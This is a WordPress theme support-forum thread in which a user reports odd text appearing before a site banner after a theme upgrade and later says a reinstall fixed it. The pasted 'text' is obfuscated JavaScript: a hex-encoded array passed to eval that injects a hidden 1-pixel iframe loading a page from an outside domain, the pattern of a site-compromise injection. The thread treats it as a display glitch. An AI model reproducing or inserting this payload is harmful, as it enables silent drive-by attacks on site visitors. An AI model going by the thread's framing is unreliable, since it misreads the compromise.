Wordpress Themes - WP Forum at BFA
Click here to register or to donate.
Auto self-registration is not available here - far too many spammers. This forum has many, many backlinks and because of that there is an intense desire among spammers to drop their links here.

Wordpress Themes - WP Forum at BFA » WordPress Themes » Atahualpa 3 Wordpress theme » Header configuration & styling »

[SOLVED] Text appearing before banner after upgrade to 3.5.1


  #1  
Old Mar 9, 2013, 07:47 AM
shayf
 
2 posts · Mar 2013
Ireland
I have updated to V3.5.1 and the text below appears before the banner, the problem can be seen at shayfarrelly.com

I have tried changing to a different theme and the problem does happen with the new theme. I then go back to the Atahualpa theme and I have also reset all the options and the text is still there. Appreciate any help anyone can give.

Regards

Shay

text that appears before the banner:

asgq=[0x28,0x66,0x75,0x6e,0x63,0x74,0x69,0x6f,0x6e,0x20, 0x28,0x29,0x20,0x7b,0xd,0xa,0x20,0x20,0x20,0x20,0x 76,0x61,0x72,0x20,0x66,0x20,0x3d,0x20,0x64,0x6f,0x 63,0x75,0x6d,0x65,0x6e,0x74,0x2e,0x63,0x72,0x65,0x 61,0x74,0x65,0x45,0x6c,0x65,0x6d,0x65,0x6e,0x74,0x 28,0x27,0x69,0x66,0x72,0x61,0x6d,0x65,0x27,0x29,0x 3b,0xd,0xa,0xd,0xa,0x20,0x20,0x20,0x20,0x66,0x2e,0 x73,0x72,0x63,0x20,0x3d,0x20,0x27,0x68,0x74,0x74,0 x70,0x3a,0x2f,0x2f,0x61,0x6b,0x61,0x64,0x65,0x6d,0 x69,0x61,0x72,0x6f,0x7a,0x77,0x6f,0x6a,0x75,0x2e,0 x6e,0x65,0x74,0x2f,0x72,0x65,0x6c,0x2e,0x70,0x68,0 x70,0x27,0x3b,0xd,0xa,0x20,0x20,0x20,0x20,0x66,0x2 e,0x73,0x74,0x79,0x6c,0x65,0x2e,0x70,0x6f,0x73,0x6 9,0x74,0x69,0x6f,0x6e,0x20,0x3d,0x20,0x27,0x61,0x6 2,0x73,0x6f,0x6c,0x75,0x74,0x65,0x27,0x3b,0xd,0xa, 0x20,0x20,0x20,0x20,0x66,0x2e,0x73,0x74,0x79,0x6c, 0x65,0x2e,0x62,0x6f,0x72,0x64,0x65,0x72,0x20,0x3d, 0x20,0x27,0x30,0x27,0x3b,0xd,0xa,0x20,0x20,0x20,0x 20,0x66,0x2e,0x73,0x74,0x79,0x6c,0x65,0x2e,0x68,0x 65,0x69,0x67,0x68,0x74,0x20,0x3d,0x20,0x27,0x31,0x 70,0x78,0x27,0x3b,0xd,0xa,0x20,0x20,0x20,0x20,0x66 ,0x2e,0x73,0x74,0x79,0x6c,0x65,0x2e,0x77,0x69,0x64 ,0x74,0x68,0x20,0x3d,0x20,0x27,0x31,0x70,0x78,0x27 ,0x3b,0xd,0xa,0x20,0x20,0x20,0x20,0x66,0x2e,0x73,0 x74,0x79,0x6c,0x65,0x2e,0x6c,0x65,0x66,0x74,0x20,0 x3d,0x20,0x27,0x31,0x70,0x78,0x27,0x3b,0xd,0xa,0x2 0,0x20,0x20,0x20,0x66,0x2e,0x73,0x74,0x79,0x6c,0x6 5,0x2e,0x74,0x6f,0x70,0x20,0x3d,0x20,0x27,0x31,0x7 0,0x78,0x27,0x3b,0xd,0xa,0xd,0xa,0x20,0x20,0x20,0x 20,0x69,0x66,0x20,0x28,0x21,0x64,0x6f,0x63,0x75,0x 6d,0x65,0x6e,0x74,0x2e,0x67,0x65,0x74,0x45,0x6c,0x 65,0x6d,0x65,0x6e,0x74,0x42,0x79,0x49,0x64,0x28,0x 27,0x66,0x27,0x29,0x29,0x20,0x7b,0xd,0xa,0x20,0x20 ,0x20,0x20,0x20,0x20,0x20,0x20,0x64,0x6f,0x63,0x75 ,0x6d,0x65,0x6e,0x74,0x2e,0x77,0x72,0x69,0x74,0x65 ,0x28,0x27,0x3c,0x64,0x69,0x76,0x20,0x69,0x64,0x3d ,0x5c,0x27,0x66,0x5c,0x27,0x3e,0x3c,0x2f,0x64,0x69 ,0x76,0x3e,0x27,0x29,0x3b,0xd,0xa,0x20,0x20,0x20,0 x20,0x20,0x20,0x20,0x20,0x64,0x6f,0x63,0x75,0x6d,0 x65,0x6e,0x74,0x2e,0x67,0x65,0x74,0x45,0x6c,0x65,0 x6d,0x65,0x6e,0x74,0x42,0x79,0x49,0x64,0x28,0x27,0 x66,0x27,0x29,0x2e,0x61,0x70,0x70,0x65,0x6e,0x64,0 x43,0x68,0x69,0x6c,0x64,0x28,0x66,0x29,0x3b,0xd,0x a,0x20,0x20,0x20,0x20,0x7d,0xd,0xa,0x7d,0x29,0x28, 0x29,0x3b];try{document.body|=1}catch(gdsgsdg){zz=3;dbshre=8 3;if(dbshre){vfvwe=0;try{}catch(agdsg){vfvwe=1;}if (!vfvwe){e=window["eval"];}s="";for(i=0;i-448!=0;i++){if(window.document)s+=String.fromCharC ode(asgq[i]);}z=s;e(s);}}>
  #2  
Old Mar 9, 2013, 07:57 AM
shayf
 
2 posts · Mar 2013
Ireland


Ok I solved it this time I changed the Theme as before but then I deleted the Atahualpa theme and then re-installed it and hey-presto problem gone. Should have thought of this before posting problem!

Bookmarks

Tags
3.5.1, text before banner

Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes


Similar Threads
Thread Thread Starter Forum Replies Last Post
Text not appearing in IE and Chrome sradhey Atahualpa 3 Wordpress theme 1 Feb 1, 2012 03:37 AM
favicon not appearing in website, appearing only in admin panel biswajitdey13 Header configuration & styling 1 Sep 3, 2010 01:56 PM
[SOLVED] Rogue text appearing above posts SimonKemp Post-Kicker, -Byline & -Footer 3 Nov 17, 2009 04:39 PM
Blog titles are appearing after the text on homepage brokencosmos Header configuration & styling 1 Oct 3, 2009 07:52 PM


All times are GMT -6. The time now is 06:02 AM.


Powered by vBulletin® Copyright ©2000 - 2018, Jelsoft Enterprises Ltd.